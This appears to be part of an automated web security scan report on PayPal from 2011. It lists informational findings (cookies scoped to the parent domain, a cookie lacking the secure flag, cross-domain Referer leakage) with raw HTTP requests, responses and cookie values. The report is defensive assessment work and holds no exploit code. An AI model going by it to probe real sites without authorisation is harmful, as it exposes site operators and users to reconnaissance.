Set-Cookie: pNTcMTtQfrJuaJiwEnWXQ6yNxfq=GiU6xb6uUqmEY7WNSEyBQtkIgp_LIh4AwHkmkEjCcoebsrKV-EHex7giKPrq06CWhDgVEwQsSfQXC1unRUZuCzE9_Mb98BDvJntpHMwEgkmo2oiXXRGxyZ9Uf_2OA3tHM7fp-xPCOds-dwqIx36B5uKtGdkCfPZVvMljV9uMGCuDNsCMh8XUS8TZ4Y_b7fXLZ50Lv4DuGNOemoAqTb44Rf5sUDYwgEEmyMLfrTUlsdd4gc4Y7Dja2qDgI8je6Ay7mIbyqk2nbgRm5HLc5VRSkeAKkNbdpLyd24nJV3s2nvtSDFKj1hY4R8HJtN5PYQuDbKNj1lr1r2xqs4mut2r9QKiECLPNtmNRD7uj1lAZ6AgVpyB5u5mV9qnXWr7dgQJJVBtfv8odlPfTf5W__h2NFu02TK5NwQFfwOW6l69EvJBuQVRFUoHFcHBst38JoqdUBBWvanIclLNBnCq1bhlFz_Z0XuHRHL7-GwF29iZ9hH0J6FBr1xjrro7OlWJh051YqsXh_NTGctnXXUxewLTJ91QHghXs0oXUc2_ntNK8dfY_8L59OdLzcvUQYEhMHIjFX-mYqsTjF9buP7r8IbK1LdpzC1MSgRzx2dEajZeaz-_m0wQhx_PUU3tND3PqDDb2UJygYG; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.2; expires=Thu, 07-Aug-2031 13:47:36 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Location: https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&SESSION=dGCHByTXb4oBFgyeuAXjuhgU8PO5NrYKZFXVhK2-Lz5cxpUYaru1hsPe5zi&dispatch=5885d80a13c0db1f8e263663d3faee8d1e83f46a36995b3856cef1e18897ad75
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html
Content-Length: 0

5.23. https://www.paypal.com/us/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/webscr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
cwrClyrK4LoCV1fydGbAxiNL6iG=qfL6Am0KfL1hh1oV__m3JHGER4q70E8XARLU5bi3P_yeLJsbn8sy-oS6fxLboLlD0cf2uBfniBTOnrszb5GdBCq686d7fOeLto2evxLtPe2X7YCa7F5W7B5B78P2T4n6RJkghG%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156848; domain=.paypal.com; path=/; Secure; HttpOnly
feel_cookie=a%205%20_home%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2045%20xpt%2fMarketing_CommandDriven%2fhomepage%2fMainHome%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2063%20Send%20Money%2c%20Pay%20Online%20or%20Set%20Up%20a%20Merchant%20Account%20with%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /us/cgi-bin/webscr?cmd=_home HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.24. https://www.paypal.com/us/ewf/f=pps_spf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/ewf/f=pps_spf

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

navcmd=_external-webform; domain=.paypal.com; path=/; Secure; HttpOnly
feel_cookie=a%2017%20_external-webform%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2011%20p%2fgen%2flogin%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2019%20Contact%20Us%20-%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /us/ewf/f=pps_spf HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.25. https://www.paypal.com/us/ewf/f=sa_unauth previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/ewf/f=sa_unauth

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

navcmd=_external-webform; domain=.paypal.com; path=/; Secure; HttpOnly
feel_cookie=a%2017%20_external-webform%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2011%20p%2fgen%2flogin%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2019%20Contact%20Us%20-%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /us/ewf/f=sa_unauth HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6. SSL cookie without secure flag set previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

Apache=10.190.9.182.1313112145907951; path=/; expires=Sun, 04-Aug-41 01:22:25 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

Request

Response

7. Cross-domain Referer leakage previous next
There are 30 instances of this issue:

/ca/cgi-bin/webscr
/cgi-bin/helpscr
/cgi-bin/helpscr
/cgi-bin/helpweb
/cgi-bin/marketingweb
/cgi-bin/searchscr
/cgi-bin/webscr
/cgi-bin/webscr
/cgi-bin/webscr
/cgi-bin/webscr
/cgi-bin/webscr
/cgi-bin/webscr
/cgi-bin/webscr
/helpcenter/main.jsp
/helpcenter/main.jsp
/helpcenter/main.jsp
/us/cgi-bin/
/us/cgi-bin/
/us/cgi-bin/helpscr
/us/cgi-bin/helpscr
/us/cgi-bin/helpweb
/us/cgi-bin/marketingweb
/us/cgi-bin/marketingweb
/us/cgi-bin/searchscr
/us/cgi-bin/webscr
/us/cgi-bin/webscr
/us/cgi-bin/webscr
/us/cgi-bin/webscr
/us/cgi-bin/webscr
/us/cgi-bin/webscr

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

7.1. https://www.paypal.com/ca/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/ca/cgi-bin/webscr

Issue detail

The page was loaded from a URL containing a query string:

https://www.paypal.com/ca/cgi-bin/webscr?cmd=xpt/Marketing_CommandDriven/general/PBPInfo-outside

The response contains the following links to other domains:

https://merchant.paypal.ca/ca/cgi-bin/marketingweb?cmd=_render-content&content_ID=merchant/wp_standard&nav=0.3.1
https://paypal.112.2o7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript
https://www.paypal-blog.ca/
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/paypal.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/pages/pageStaySafe.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/yui/event.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/yui/yahoo.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_main.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/en_US/i/bnr/bnr_topbtmlfttrustsafety_202w.gif
https://www.paypalobjects.com/en_US/i/bnr/bnr_topbtmrgtbtntrustsafety_38w.gif
https://www.paypalobjects.com/en_US/i/bnr/bnr_toptrustsafety_240w.gif
https://www.paypalobjects.com/en_US/i/header/hdr_tandsprotectionbuyers_516w_53h.gif
https://www.paypalobjects.com/en_US/i/header/spot_tandsprotectionbuyers_240wx155h.jpg
https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico
https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png
https://www.paypalobjects.com/en_US/i/scr/pixel.gif
https://www.paypalobjects.com/en_US/i/scr/scr_bulletCheck_14x13.gif
https://www.paypalobjects.com/en_US/i/scr/scr_lftbluebar_10w.gif
https://www.paypalobjects.com/en_US/i/scr/scr_lftbluebarbttm_240w.gif
https://www.paypalobjects.com/en_US/i/scr/scr_lftbluebtmcrnr_10w.gif
https://www.paypalobjects.com/en_US/i/scr/scr_rCornerGrey_bl_5x5.gif
https://www.paypalobjects.com/en_US/i/scr/scr_rCornerGrey_br_5x5.gif
https://www.paypalobjects.com/en_US/i/scr/scr_rCornerGrey_tl_5x5.gif
https://www.paypalobjects.com/en_US/i/scr/scr_rCornerGrey_tr_5x5.gif
https://www.paypalobjects.com/en_US/i/scr/scr_rtbluebar_10w.gif
https://www.paypalobjects.com/en_US/i/scr/scr_rtbluebtmcrnr_10w.gif
https://www.paypalobjects.com/en_US/i/scr/scr_triangleOrange_13x13.gif

Request

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:48:51 GMT
Server: Apache
Set-Cookie: navcmd=xpt%2fMarketing_CommandDriven%2fgeneral%2fPBPInfo-outside; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 13:48:52 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%2051%20xpt%2fMarketing_CommandDriven%2fgeneral%2fPBPInfo-outside%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2051%20xpt%2fMarketing_CommandDriven%2fgeneral%2fPBPInfo-outside%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2032%20PayPal%20Buyer%20Protection%20-%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23055

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/paypal.css">

<link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/pages/pageStaySafe.css"><style type="text/css"></style><link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"><link rel="apple-touch-icon" href="https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png"><style type="text/css" id="antiClickjack">
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_main.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/yui/yahoo.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/yui/event.js"></script>
...[SNIP]...
<div class="PrdRBC" id="generalbuyerprotection"><img src="https://www.paypalobjects.com/en_US/i/header/hdr_tandsprotectionbuyers_516w_53h.gif" border="0" alt=""><br>
...[SNIP]...
</a><img src="https://www.paypalobjects.com/en_US/i/scr/scr_bulletCheck_14x13.gif" border="0" alt=""></td><td><img alt="" border="0" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" height="1"></td>
...[SNIP]...
</a><img src="https://www.paypalobjects.com/en_US/i/scr/scr_bulletCheck_14x13.gif" border="0" alt=""></td><td><img alt="" border="0" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" height="1"></td>
...[SNIP]...
<td width="20"><img alt="" border="0" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" height="1"></td>
...[SNIP]...
<div class="PrdRBC" id="generalbpmoreinfo"><img src="https://www.paypalobjects.com/en_US/i/header/spot_tandsprotectionbuyers_240wx155h.jpg" border="0" alt=""><br>
...[SNIP]...
<td width="5"><img border="0" src="https://www.paypalobjects.com/en_US/i/scr/scr_rCornerGrey_tl_5x5.gif" alt=""></td><td width="100%" class="boxRoundPriority2Top"><img alt="" border="0" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" height="1"></td><td width="5"><img src="https://www.paypalobjects.com/en_US/i/scr/scr_rCornerGrey_tr_5x5.gif" border="0" alt=""></td>
...[SNIP]...
<td width="5"><img border="0" src="https://www.paypalobjects.com/en_US/i/scr/scr_rCornerGrey_bl_5x5.gif" alt=""></td><td width="100%" class="boxRoundPriority2Bottom"><img alt="" border="0" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" height="1"></td><td width="5"><img src="https://www.paypalobjects.com/en_US/i/scr/scr_rCornerGrey_br_5x5.gif" border="0" alt=""></td>
...[SNIP]...
<td colspan="3"><img src="https://www.paypalobjects.com/en_US/i/bnr/bnr_toptrustsafety_240w.gif" border="0" alt=""></td></tr><tr><td colspan="3"><img src="https://www.paypalobjects.com/en_US/i/bnr/bnr_topbtmlfttrustsafety_202w.gif" border="0" alt=""><a href="https://www.paypal.com/ca/cgi-bin/webscr?cmd=xpt/Marketing/general/PayPalStaySafe-outside"><img src="https://www.paypalobjects.com/en_US/i/bnr/bnr_topbtmrgtbtntrustsafety_38w.gif" border="0" alt=""></a></td></tr><tr><td valign="top" width="10"><img src="https://www.paypalobjects.com/en_US/i/scr/scr_lftbluebar_10w.gif" border="0" alt=""></td>
...[SNIP]...
<td width="10%"><img alt="" border="0" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" height="1"></td><td width="9%"><img src="https://www.paypalobjects.com/en_US/i/scr/scr_triangleOrange_13x13.gif" border="0" alt=""> </td>
...[SNIP]...
<td width="10%"><img alt="" border="0" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" height="1"></td><td width="9%"><img src="https://www.paypalobjects.com/en_US/i/scr/scr_triangleOrange_13x13.gif" border="0" alt=""> </td>
...[SNIP]...
<td width="10%"><img alt="" border="0" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" height="1"></td><td width="9%"><img src="https://www.paypalobjects.com/en_US/i/scr/scr_triangleOrange_13x13.gif" border="0" alt=""> </td>
...[SNIP]...
<td valign="top" width="10"><img src="https://www.paypalobjects.com/en_US/i/scr/scr_rtbluebar_10w.gif" border="0" alt=""></td></tr><tr><td valign="top" width="10"><img src="https://www.paypalobjects.com/en_US/i/scr/scr_lftbluebtmcrnr_10w.gif" border="0" alt=""></td><td valign="top" width="220"><img src="https://www.paypalobjects.com/en_US/i/scr/scr_lftbluebarbttm_240w.gif" border="0" alt=""></td><td valign="top" width="10"><img src="https://www.paypalobjects.com/en_US/i/scr/scr_rtbluebtmcrnr_10w.gif" border="0" alt=""></td>
...[SNIP]...
<li><a href="https://www.paypal-blog.ca">Our Blog</a>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
<li><a href="https://merchant.paypal.ca/ca/cgi-bin/marketingweb?cmd=_render-content&content_ID=merchant/wp_standard&nav=0.3.1" class="scTrack:SRD:Nav:230">Accept Credit Cards</a>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script>

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...
<noscript><img
src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

7.2. https://www.paypal.com/cgi-bin/helpscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/helpscr

Issue detail

The page was loaded from a URL containing a query string:

https://www.paypal.com/cgi-bin/helpscr?cmd=_home-general&nav=0

The response contains the following links to other domains:

https://paypal.112.2o7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript
https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecRF0711_560wx228.jpg
https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecuritP1_750x70.gif
https://www.paypal-labs.com/
https://www.paypalobjects.com/WEBSCR-640-20110722-1/Marketing/css/pages/ConsumerRevamp.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/core.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/marketing/marketing.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js
https://www.paypalobjects.com/en_US/Marketing/i/scr/scr_cpr_graydots_547x1.gif
https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico
https://www.paypalobjects.com/en_US/i/logo/logo_VIPwhite_66x27.gif
https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png
https://www.paypalobjects.com/js/tns/min/bid.js
https://www.x.com/

Request

GET /cgi-bin/helpscr?cmd=_home-general&nav=0 HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:47:14 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 13:47:15 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%2013%20_home-general%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2045%20xpt%2fMarketing_CommandDriven%2fhomepage%2fMainHome%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2063%20Send%20Money%2c%20Pay%20Online%20or%20Set%20Up%20a%20Merchant%20Account%20with%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24762

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=8"><link media="all" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/core.css"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/marketing/marketing.css"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/Marketing/css/pages/ConsumerRevamp.css">

<link rel="apple-touch-icon" href="https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png"><style type="text/css" id="antiClickjack">
...[SNIP]...
</style><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js"></script>
...[SNIP]...
</script><link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"></head>
...[SNIP]...
href=https://www.paypal.com/cgi-bin/webscr?cmd=_mpi-click-outside&cid=8444&oid=49775&bn=AjYsXGN6DA8XUCUfQBA&s=NAo3MxA&landing_url=ORAcFnkYQgcdFgwCQFsADwo8KBopNBZsFSYkQDgsRQoGSHRsYAZlZEZUYQhnRXNWYlRFUw><img src='https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecRF0711_560wx228.jpg' border='0' alt=''/></a>
...[SNIP]...
</div><img src="https://www.paypalobjects.com/en_US/Marketing/i/scr/scr_cpr_graydots_547x1.gif" border="0" class="dottedline" alt=""><p class="acceptCredit">
...[SNIP]...
href=https://www.paypal.com/cgi-bin/webscr?cmd=_mpi-click-outside&cid=8444&oid=49777&bn=AjYsXGN6DA8XUCUfQBA&s=NAo3MxA&landing_url=ORAcFnkYQgcdFgwCQFsADwo8KBopNBZsFSYkQDgsRQoGSHRsYAZlZEZUYQhnRXNWYlRFUQ><img src='https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecuritP1_750x70.gif' border='0' alt=''/></a>
...[SNIP]...
<li><a href="https://www.x.com/">PayPal Developers</a>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
<li><a href="https://www.paypal-labs.com">PayPal Labs</a>
...[SNIP]...
<a target="_blank" href="https://www.paypal.com/cgi-bin/webscr?cmd=xpt/Customer/popup/SecurityKeyVIP-outside" onClick="PAYPAL.core.openWindow(event, {width: 425, height: 350})"><img border="0" src="https://www.paypalobjects.com/en_US/i/logo/logo_VIPwhite_66x27.gif" alt=""></a>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/js/tns/min/bid.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...
<noscript><img
src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

7.3. https://www.paypal.com/cgi-bin/helpscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/helpscr

Issue detail

The page was loaded from a URL containing a query string:

https://www.paypal.com/cgi-bin/helpscr?cmd=_help&t=escalateTab

The response contains the following links to other domains:

https://paypal.112.2o7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript
https://www.paypal-labs.com/
https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/core/global.css
https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/core/print.css
https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/help/chrome.css
https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/help/curd.css
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/agent.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/curd.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/global.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/widgets.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/en_US/i/icon/icon_animated_prog_42wx42h.gif
https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico
https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png
https://www.x.com/

Request

GET /cgi-bin/helpscr?cmd=_help&t=escalateTab HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:47:13 GMT
Server: Apache
Set-Cookie: help_cookie=; expires=Mon, 19-Sep-2011 01:47:14 GMT; domain=paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%205%20_help%20b%200%20%20c%207%20helpscr%20d%200%20%20e%200%20%20f%200%20%20g%205%20en_US%20h%200%20%20i%2029%20xpt%2fHelp%2fhelpcenter%2fContactUs%20j%200%20%20k%2019%20Contact%20Us%20-%20PayPal%20l%200%20%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 117486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=8"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/core/global.css"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/help/curd.css">

<link media="screen" rel="stylesheet" type="text/chrome" href="https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/help/chrome.css">

<link media="print" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/core/print.css"><style type="text/css">
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/global.js"></script>
...[SNIP]...
</script><link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"><link rel="apple-touch-icon" href="https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png"></head>
...[SNIP]...
